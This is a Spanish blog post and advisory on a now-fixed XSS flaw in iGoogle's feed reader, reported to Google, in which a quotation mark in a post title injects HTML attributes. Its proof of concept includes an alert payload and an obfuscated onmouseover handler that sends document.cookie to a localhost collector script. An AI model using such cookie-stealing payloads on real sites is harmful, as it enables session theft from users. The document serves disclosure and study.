Historia de unas cruzadas en pascua: iGoogle Ajax Feeds XSS

Como bien dice el título del post, narraré brevemente como descubrí la vulnerabilidad, para que se haga más ameno el post .

Resulta que estaba yo un día escribiendo este post en 0verl0ad y después de su publicación, pase a otras tareas y necesité hacer un reverse DNS a una web, en esos momentos me vino a la cabeza el reverse DNS que 0zX había codeado para undersecurity, pero que no había puesto online porque necesitaba hacer pasar las peticiones por un archivo intermedio. Luego de terminar con el reverse DNS, estaba ojeando los RSS y viendo el post de 0verl0ad algo así como una especie de idea “Maligna” paso por mi cabeza y pensé en  poner un alert en la Posdata del post, pensando que si a su vez que 0z necesitaba hacer pasar las peticiones por un archivo intermedio a lo mejor si la información del feed del blogger de The X-C3LL pasaba por el feedburner luego los feeds de google podrían interpretar algo mal y saltar un alert. La verdad es que no tenía casi ninguna esperanza en que saltara un alert, y de echo no saltó … entonces… ¿como es que haces este post? Al cabo de unas horas volví a mirar los RSS y me dispuse a volver a editar el post para agregar unas cosas, y de repente cuando clicke en el post … PUM alert del 5,5² (xD), en eso que me quedé como WTF!!!!

Ya habiendo encajado las ideas me puse a mirar el código fuente de la página de los feeds buscando de donde salía el extraño XSS. La verdad es que la respuesta que me encontré fue bastante sorprendente, a partir de ahí ya comenzaron los MP’s a todo Cristo (enrealidad solo a setH) para poder buscar un tester.

Sin más preámbulos dejo la especie de advisorie que hice junto con la ayuda de The X-C3LL (gracias por leer la parrafada )

————————————————————————————–

Advisorie

/*
Author: Lix
Writer in: http://0verl0ad.blogspot.com/
Blog: http://arrivalsec.wordpress.com/
Testers: The X-C3LL
*/

/.0×01 Posible vulnerabilidad descubierta.

La vulnerabilidad encontrada es un XSS, que puede ser explotada mediante un método bastante extraño. A través del lector de feeds de igoogle conseguimos ejecutar código HTML y JavaScript.

/.0×02 Causa

Según lo que hemos estado testeando hasta el momento, hemos llegado a la conclusión de que la ejecución de código JavaScript se debe a lo siguiente.

Teóricamente en un post cualquiera de nuestro blog o cualquier CMS escribimos una entrada como cualquier otra, pero sin embargo si en algún momento usamos las “ esto produce que en el script de lectura de los feeds de igoogle cerremos la etiqueta title mediante la cual aparece el nombre de nuestro post en el feed, debido a esto a partir de la clausura de la etiqueta todo se convierte en atributos html.

En si el fallo está en el elemento <a>

/.0×03 PoC

<a href=”http://0verl0ad.blogspot.com/2009/04/full-path-disclosure-fpd.html” target=”_blank” title=“Saludos a todos,Hace ya tiempo que no hago mención
a alguna vulnerabilidad de esas que consideramos de Regional Preferente… me refiero a esas que medio mundo desprecia,
y el otro medio cuando algún colgado (como el servidor aquí presente) explica dicen aquello de… AHH ¿Pero esto es una vulnerabilidad?.Y como no podría ser de otra forma, el [...]

[...]   poder localizar el lugar donde se encuentran los ficheros que incluye (P.E.: $path = “ (como ven a partir de aquí todo se convierte en atributos)
juaker=”" .$_get[="" file="" ];=”" include($path);,=”" sabes=”" qeu=”" tu=”" shell=”" está=”" upload=”" ,=”" vas=”" necesitar=”" aplicar=”" ..=”"
saltar=”" includes=”" ).=”" común=”" puede=”" sentencias=”" contenido=”" ficheros=”" través=”" sqli,=”" ejemplo=”" emplear=”" load_file()=”"
necesitaremos=”" conocer=”" path=”" exacto=”" donde=”" pasamos=”" parámetro.pero=”" hasta=”" hemos=”" estado=”" hablando=”" abstracta,=”" mucho=”"
bla=”" poco=”" movimiento,=”" así=”" procedo=”" algunas=”" formas=”" fpd.=”" supuesto=”" clásica=”" mítica=”" fichero=”" inexistente=”" parámetro=”"
función=”" trabaje=”" ficheros…=”" como=”" no=”" encuentra=”" archivo,=”" arrojará=”" he=”" mostrado.en=”"
general=”" esto=”" meter=”" parámetros=”" malformados=”" o=”" erróneos=”" suele=”" funcionar=”" bastantes=”" ámbitos,=”" ejemplo,=”" hacemos=”"
clásico=”" sqli=”" sistema=”" corre=”" windows,=”" lo=”" probable=”" nos=”" encontremos=”" con=”" mensajito=”" volcado=”" ole=”" db=”" cual=”"
encontraremos=”" ruta=”" del=”" script=”" obtuvo=”" error.=”" otro=”" escenario,=”" quizás=”" menos=”" habitual=”" pero=”" igualmente=”" interesante,=”"
null=”" sessions=”" (o=”" introducir=”" caracteres=”" extraños=”" cookie)=”" para=”" session_start()=”" error=”" (idea=”" sacada=”" owasp).la=”"
última=”" forma=”" se=”" me=”" ahora=”" mismo=”" leí=”" xianur0=”" su=”" paper=”" sobre=”" smf,=”" es=”" usar=”" array=”" vacío.=”" por=”" ejemplo:=”"
index.php=”seth[]=SUCKSCreo” vulnerabilidades=”" sensitive=”" information=”" estilo=”" esta=”" están=”" muy=”" infravaloradas,=”" ya=”" casi=”"
siempre=”" (quizás=”" soy=”" el=”" único=”" ser=”" humano=”" al=”" que=”" le=”" ocurre=”" esto)=”" son=”" un=”" recurso=”" interesante=”" y=”"
útil=”" a=”" la=”" hora=”" una=”" auditoría=”" seguridad=”" webapps.y=”" cómo=”" solucionarlo…=”" facil,=”" en=”" las=”" directivas=”" poner=”"
error_reporting(0)=”" :dbyt3zpd:=”" si=”" conoceis=”" más=”" métodos=”" de=”" provocar=”" fpds,=”" posteadlos.pd:=”"
pd2:=”" onclick=”alert(String.fromCharCode(112,114,117,101,98,97,115,53));“
pd3:=”" onmouseover=”h=String.fromCharCode(104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,47,99,111,46,112,104,112,63,99,107,61);document.location(h.concat(document.cookie);”
id=”flink_156_6299163308483600817″>Full Path Disclosure [FPD]</a>

————————————————————————————–

Pantallazo como prueba real

La vulnerabilidad esta totalmente corregida según el equipo de google security, desde aquí mando saludos a Manuel, por su rápida contestación, y por haber contestado todos los mails responsablemente.

Al final nos dimos cuenta que que el XSS no saltara a la primera fue porque el tiempo de refresco de los RSS era muy lento, y la información no se mostraba disponible, por lo tanto no llegaba a leer a la parte del alert.

Despúes de que me notificaran la corrección del fallo me atreví a pedir la correción de este mismo y las lineas vulnerables, en este momento estoy esperando dicha petición aunque no creo que pueda obtenerla .

Conclusión

Está claro que google se preocupa de sus servicios, es cierto que hubo polémica con el CSRF de gmail hace ya tiempo, pero al parecer aprendieron de ello

Desde luego abril y mayo no van a pasar a la historia por ser el mes de la seguridad de google, teniendo en cuenta este fallo más el Universal XSS in all Google Services y el
Google Chrome Universal XSS Vulnerability , espero que google siga la dinámica de corrección que lleva actualmente porque desde luego es una gran empresa que normalmente da la talla.

Saludos a todos!